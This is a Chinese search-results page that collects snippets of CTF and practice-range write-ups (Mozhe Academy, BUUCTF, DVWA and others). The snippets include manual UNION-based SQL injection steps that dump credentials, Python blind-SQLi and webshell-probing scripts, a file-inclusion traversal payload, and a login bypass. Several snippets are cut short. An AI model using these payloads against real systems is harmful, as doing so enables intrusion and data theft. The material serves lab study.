精华内容
下载资源
问答
  • 在线靶场
    2022-04-21 21:39:12

    抓包 把GET改成POST, 把中间的content剪切到末尾,去掉问号

    bug

     zh

    正确答案

     

    更多相关内容
  • 墨者学院-在线靶场

    千次阅读 2022-02-23 11:50:49
    浏览器信息伪造 更改user-agent:Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G ## 来源页伪造

    浏览器信息伪造

    题目要求

    更改user-agent:Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G

    来源页伪造

    在这里插入图片描述
    referer:http//google.com

    HTTP动作练习

    在这里插入图片描述 方法一:使用burpsuite,右键更改提交方式为post
    在这里插入图片描述方法二:使用hackbar→post data
    在这里插入图片描述GET 请求有长度限制;POST 请求对数据长度没有要求。

    投票系统程序设计缺陷分析

    在这里插入图片描述使用burpsuite→intrude
    在这里插入图片描述在这里插入图片描述

    在这里插入图片描述

    展开全文
  • 墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库) 打开环境 点击箭头指向链接 观察网页的URL发现有id=1,可能存在SQL注入点。 首先对URL进行尝试猜列名数量(字段数),在URL后面添加order by 1或者2 直到出现...

    墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

    打开环境
    点击箭头指向链接
    在这里插入图片描述

    观察网页的URL发现有id=1,可能存在SQL注入点。

    在这里插入图片描述
    首先对URL进行尝试猜列名数量(字段数),在URL后面添加order by 1或者2 直到出现页面不在显示正常页面,这就说明存在的字段数应该是现在所输入的数字减1。
    在这里插入图片描述
    在这里插入图片描述
    此处order by 4页面显示正常而order by 5出现页面不正常显示说明只存在4个字段(注此方法只适用于字段数不是很多的时候)。

    然后查看哪个字段能显示出来

    在URL后面联合查询 union select 1,2,3,4 在此之前我们还应该把前面id=1给注释掉 将id=1改为id=-1或者使用and 1=2 将id=1 给设置为假,之后发现只有第二字段和第三字段能显示出来
    在这里插入图片描述
    接下来就开始我们的查询数据库版本和数据库名。分别在第二第三字段输入database(),和 version();查看到数据库名和数据库版本
    在这里插入图片描述

    得到库名——mozhe_Discuz_StormGroup

    得到版本号:5.7.22-0ubuntu0.16.04.1(相对高点的版本存在information_schema数据库)

    有了数据库名我们就能查询它内部的表名和列名,其中information_schema储存了数据库中的表名和列名,其中information_schema.tables——记录了所有表名信息的表 ,information_schema.columns——记录了所有列名信息的表,
    table_name 表名字段 column_name 列名字段 table_schema 库名字段

    查询表名 SQL语句:
    http://219.153.49.228:43488/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
    在这里插入图片描述

    得到表名——StormGroup_member

    查询列名

    查询列名得到列名之后就能得到列名中的数据 SQL语句:
    http://219.153.49.228:43488/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=‘mozhe_Discuz_StormGroup’

    查询到列名有 :id,name,password,status,id,title,content,time
    在这里插入图片描述
    观察第二第三字段的数据为name,password 在对列名进行具体查询 SQL语句:
    http://219.153.49.228:43488/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member
    在这里插入图片描述
    最后得到了两组数据 看到密码估计是被加密了的再看其形式32位由0-9和a-z组成,应该是md5加密。在网上找一个md5在线解码处理一下,得到密码。
    最后再登录上平台上面得到:
    在这里插入图片描述
    得到key

    展开全文
  • Warmup [极客大挑战 2019]EasySQL 高明的黑客 [CISCN2019 华北赛区 Day2 Web1]Hack World

    Warmup

    提示source.php,访问/source.php查看内容

     提示source.php,访问/hint.php查看内容

    需要对$page(可以用get方式或者post方式进行传入)进行拼接来绕过mb_strpos()函数,其中网页对传入的$page参数进行了urldecode(),%253经过两次url,触发网页底部的include()函数从而可以利用文件包含漏洞

    //mb_strpos()函数是查询一个字符串在另一个字符串中出现的位置,返回值是首次出现位置的数值

    payload

    ?file=hint.php%253f/../../../../../ffffllllaaaagggg

    payload解析:
    %253f从浏览器传入会被decode为%3f,%3f被urldecode()函数解析为?那么hint.php /../../../../../ ffffllllaaaagggg就被成功传入到后端了从而执行include(hint.php /../../../../../ ffffllllaaaagggg )


    [极客大挑战 2019]EasySQL

    随意提交一份发现是get方式请求

    发现是字符型注入,而且是双引号闭合,尝试使用万能密码

    构造payload

    ?username=1&password=1' or '1' = '

    语句进入数据库后就会变成select * from table where username = '1' and password = '1' or '1'


    高明的黑客

    下载附件发现是一堆杂乱的php文件,并且还有好多不知道真假的一句话后门,后门参数也很复杂无法手动判断,利用脚本判断后门真假

    import re
    import os
    import requests
    
    files = os.listdir('src/')
    reg = re.compile(r'\$_[GET]{3}\[\'(.+)\'\]')
    for i in files:
        f = open('src/'+i)
        print('检查文件'+i)
        data = f.read()
        f.close()
        result = reg.findall(data)
        #print(i,result,"\n")
        url = 'http://2073ca8f-43a7-4086-b9b6-c03b0ddd39f3.node4.buuoj.cn:81/'
        for j in result:
            payload = url  + i + '?' + j + '=echo 123456'
            #print(payload)
            try:
                res = requests.get(url=payload,timeout=5)
            except:
                print(222222222)
            if '123456' in res.text:
                print(payload)
                payload1=url+i+'?'+j+'=cat /flag'
                res1 = requests.get(url=payload1)
                #print(payload1)
                reg1 = re.compile(r'flag\{.*?\}')
                result_flag = reg1.findall(res1.text)
                print(result_flag)
    

    输出:

    http://2073ca8f-43a7-4086-b9b6-c03b0ddd39f3.node4.buuoj.cn:81/xk0SzyKwfzw.php?Efa5BVG=echo 123456
    ['flag{c67a8c51-f28e-4fd9-bba1-8dffe98ce4a7}']

    得到flag


    [CISCN2019 华北赛区 Day2 Web1]Hack World

    打开容器,发现是一个sql查询,使用burpsuit测试发现过滤了大量的关键字,没有屏蔽ascii,substr还有'='

    输入1,和1=1 页面返回的内容都一样,考虑使用布尔盲注,手动太慢,用脚本(穷举ascii码1-127)

    import re
    import requests
    result = ""
    url='http://762429ff-8ef9-43ef-90c7-60240da0f142.node4.buuoj.cn:81/'
    for i in range(1,50):
        print(i)
        for j in range(1,128):
            post_data = {'id':"1=(ascii(substr((select(flag)from(flag)),%s,1))=%s)"%(i,j)}
            try:
                res = requests.post(url=url,data=post_data,timeout=1)
                print(post_data)
                if 'Hello' in res.text:
                    result+=chr(j)
                    print(result)
                    break
            except:
                print('404')

     成功跑出来了flag,但是很慢很慢,尝试使用二分法

    import re
    import requests
    from requests.api import post
    result = ""
    url='http://762429ff-8ef9-43ef-90c7-60240da0f142.node4.buuoj.cn:81/'
    for i in range(1,50):
        print(i)
        low = 1
        high = 127
        while(low<=high):
            mid = (low+high)//2
            post_data = {'id':"1=(ascii(substr((select(flag)from(flag)),%s,1))>%s)"%(i,mid)}
            post_data1 = {'id':"1=(ascii(substr((select(flag)from(flag)),%s,1))=%s)"%(i,mid)}
            #print(mid)
            #res1 = requests.post(url=url,data=post_data1,timeout=1)
            try:
                res = requests.post(url=url,data=post_data,timeout=1)
            except:
                print('res连接报错')
            if 'Hello' in res.text:
                low=mid +1
            else:
                try:
                    res1 = requests.post(url=url,data=post_data1,timeout=1)
                except:
                    print('res1连接报错')
                if 'Hello' in res1.text:
                    result +=chr(mid)
                    print(result)
                    break
                else:
                    high=mid-1
    
    

        输出结果一样

    展开全文
  • pikachu在线靶场(漏洞练习平台)

    千次阅读 2020-03-25 09:59:06
    希望大佬不要攻击网站,改平台只供测试学习用 测试地址: http://45.32.81.200
  • 墨者学院在线靶场writeup

    千次阅读 2019-02-14 14:41:26
    打开靶场F12,看到注释,按照注释方法构造url,index.php?url=login.php,跳转拿到key 服务器返回数据查看 F12打开控制台,点击network,点击ip,点heards,然后展开response就可以看到key 浏览器信息伪造...
  • hack the box是一个在线渗透平台,模拟了真实环境且难度较大,而且用户注册该网站时需要绕过关卡并获取邀请码,涉及审查元素、base64解密、发送post请求等操作,挺有意思的。这是一篇基础性文章,将讲述注册过程、...
  • 运维搭建CTFd在线靶场

    千次阅读 2020-06-09 14:09:15
    CentOS7.2搭建ctfd靶场平台 参考 先有一台CentOS7.2无界面的 2核4G内存30G磁盘 然后网络桥接模式 配置CentOS7的yum源为阿里的 1、安装git yum provides git yum -y install git 2、安装pip(有坑) CentOS...
  • 尝试在URL后,输入and 1=1显示正常,and 1=2显示不正常,判断此处存在SQL注入 order by 获取字段数为4 and 1=2 union select 1,2,3,4 发现2在原文Title处,3在content处 and 1=2 union select 1,version(),...
  • 在线靶场

    2021-05-06 10:52:56
    在线靶场 DVMA: http://43.247.91.228:81/ XSS: http://59.63.200.79:8004/Feedback.asp 其他安全问题,可以关注我公众号咨询我
  • 靶场练习 封神台-掌控安全在线演练靶场 第一章:为了女神小芳!
  • 点开靶场地址,发现要进行登录,根据题意得知是弱口令,于是使用账号admin,密码admin登录,发现登录进去了,但是不能访问,要特定地址才可以。于是浏览器挂代理,打开burp suite进行抓包。抓到数据包后,将数据包...
  • DVWA靶场,集成了owasp top 10漏洞,可以在这里面进行学习漏洞原理、利用和危害
  • 点击访问 利用bp抓包 修改为谷歌 进行放行 BUG↓↓ 正确答案
  • redis未授权漏洞vulhub靶场复现
  • 实验目标: 了解越权漏洞 熟练使用burp 打开靶机 我们先看一下题目 打开网站,有个测试用户 ...我们使用burp 抓包,去修改会员名,,一般用户的会员名都差不多,我们先只修改后面两位试试。...
  • 点开网页,看到是一个国旗,点右键发现Java script 禁用鼠标右键。 于是按F12进入开发者模式,根据题意找到图片,点击右键open in new tab,打开一个新窗口,然后右键...于是在靶场地址的后面加上这个or3.php。htt...
  • 打开靶场网页,下载文件并解压。 、 根据题意网站遭到境外ip攻击,请通过log,找到找到访问news.html最多的境外IP地址。 (使用记事本打开文件,界面太乱,不方便分析,而且打开后等待内容出现需要一段时间。) 使用...
  • 在线靶场 ( 持续更新~ )

    千次阅读 2018-10-22 20:55:00
    在这里我们收集了网络上的一下在线靶场 upload-labs http://upload-labs.caoyo.top 使用 库 下的免费空间所搭建,如想自主搭建想要的程序,请在 库 下访问 “ 免费空间 ” 项目! upload-labs是一个使用php...
  • 查看一下页面源代码吧 ...本次靶场的网页禁止了使用右键进入网页源代码,我们可以通过对网页用F12键进入浏览器的开发者模式。即可看到网页源代码。前提是要浏览器可以支持使用F12键或快捷键进入开发者模式 ...
  • 打开靶场网页,点击静夜思得知url太长,使用get请求方式不合适。 于是打开浏览器的代理。运行burp suite。点击静夜思,burp suite开始抓包,抓到数据包后右键点击Chang request method。更改提交方式(POST),然后...
  • 1、先进入靶场网页,点击右键查看网页源代码。 2、因为192.168.1.1是个内网地址,所以是访问不了的。而后面那个19281028102.php有点可疑。 3、于是把19281028102.php放在219.153.49.228:47232后面,在访问,即可...
  • 点击靶场网页,点击搜索引擎数据查询平台,提示要从google.com中进去。 于是打开浏览器代理,运行burp suite进行抓包,抓到数据包后,将数据包send to Repeater。在Repeater页面raw选项中更改Referer的内容为:...
  • 产生漏洞的原因为:当启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式。 method: < name >...如果没有加载完(靶场环境可能没有完全部署好),可能会影响工具检测结果。 ...
  • XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
  • 打开靶场,下载日志文件。 打开日志文件,寻找Google蜘蛛的IP地址。 google蜘蛛的ua一般是以下几种 #UA “AdsBot-Google (+http://www.google.com/adsbot.html)” #UA “Googlebot-Image/1.0” #UA “Googlebot/2.1 ...
  • 点击网页,发现可以上传文件,于是上传PHP文件一句话木马上去,提交上传时,出现只能jpg、png等格式才能上传,于是把abc.php文件改为abc.png文件。 ...然后点GO,网页反馈回来的信息上传成功路径为uploads/abc...
  • 打开靶场网页,下载文件并解压。 根据题意得知有一个IP在扫描445端口,利用MS17-010漏洞批量扫描服务器,找到这个IP地址。 (Eternalblue通过TCP端口445和139来利用S MBv1和NBT中的远程代码执行漏洞,恶意代码会扫描...
  • 如果没有加载完(靶场环境可能没有完全部署好),可能会影响工具检测结果。 方法一:Struts2漏洞检查工具2017版下载地址: https://www.jb51.net/softs/574358.html。 打开Struts2漏洞检查工具2017版。将靶场网址...
  • 打开靶场网页,根据题意管理员留下的邮件测试页面。于是寻找邮件测试页面。 打开邮件测试页面。 使用邮件注入木马 You name:mozhe(随便输入) Your email:“abc”. -OQueueDirectory=/tmp/. -X/var/...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,920
精华内容 768
关键字:

在线靶场